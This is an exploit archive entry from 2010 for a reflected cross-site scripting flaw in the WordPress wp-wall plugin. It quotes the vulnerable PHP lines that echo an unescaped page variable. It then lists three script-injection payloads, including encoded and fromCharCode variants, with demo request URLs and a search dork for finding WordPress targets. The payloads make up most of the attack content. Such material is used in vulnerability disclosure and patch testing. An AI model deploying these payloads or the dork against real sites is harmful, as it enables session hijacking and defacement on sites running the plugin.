|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | WordPress 2.9 plugin wp-wall (XSS) Cross Site Scripting Vulnerability
|
ExploitAlert : 7683
Credit : Cair3x
Date : 12.01.2010
Download
Plain text version
 Exploit Code : # SecurityReason Note :
#
# Vulnerable Code :
#
# $result.='<input type="hidden" name="wallpage" id="wallpage"
value="'.$page.'" />';
#
# $result.='<input type="hidden" name="page_left" id="page_left"
value="'.(($page > #1) ? ($page-1) : $page).'" />';
#
# $result.='<input type="hidden" name="page_right" id="page_right"
value="'.(($page #< $pages) ? ($page+1) : $page).'" />';
#
####################################################################
[+] Exploit Title: WordPress 2.9
[+] Date: 2010-01-12
[+] Author: Ashiyane Digital Security Members (Cair3x)
[+] Software Link: http://wordpress.org/
[+] Version: 2.9
[+] Tested on: ALL
[+] Dork: Powered by WordPress
####################################################################
[Vulnerable File ]
wp-wall-ajax.php (Blog)
(The post variable, Refresh)
[ EXPLOIT ]
> >"><ScRiPt %0A%0D>alert(402359431180)%3B</ScRiPt>
Or
%3E%22%3E%3CScRiPt%3Ealert(402359431180)%3C/ScRiPt%3E
Or
%3E%22%3E%3CScRiPt%3Ealert(String.fromCharCode(83,104,97,104,114,105,121,97
,114,45,74))%3C/ScRiPt%3E
Demo :
Http://127.0.0.1/blog/wp-content/plugins/wp-wall/wp-wall-ajax.php?refresh=1
>"><ScRiPt %0A%0D>alert(402359431180)%3B</ScRiPt>
Or
Http://127.0.0.1/blog/wp-content/plugins/wp-wall/wp-wall-ajax.php?refresh=1
%3E%22%3E%3CScRiPt%3Ealert(402359431180)%3C/ScRiPt%3E
Or
Http://127.0.0.1/blog/wp-content/plugins/wp-wall/wp-wall-ajax.php?refresh=1
%3E%22%3E%3CScRiPt%3Ealert(String.fromCharCode(83,104,97,104,114,105,121,97
,114,45,74))%3C/ScRiPt%3E
#####################################################################
BY : Cair3x [Cair3x.Support@Gmail.com]
Web Site : Ashiyane.org
Forum : Http://Ashiyane.org/forums/
[+] Greetz to All Ashiyane Digital Security Member
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|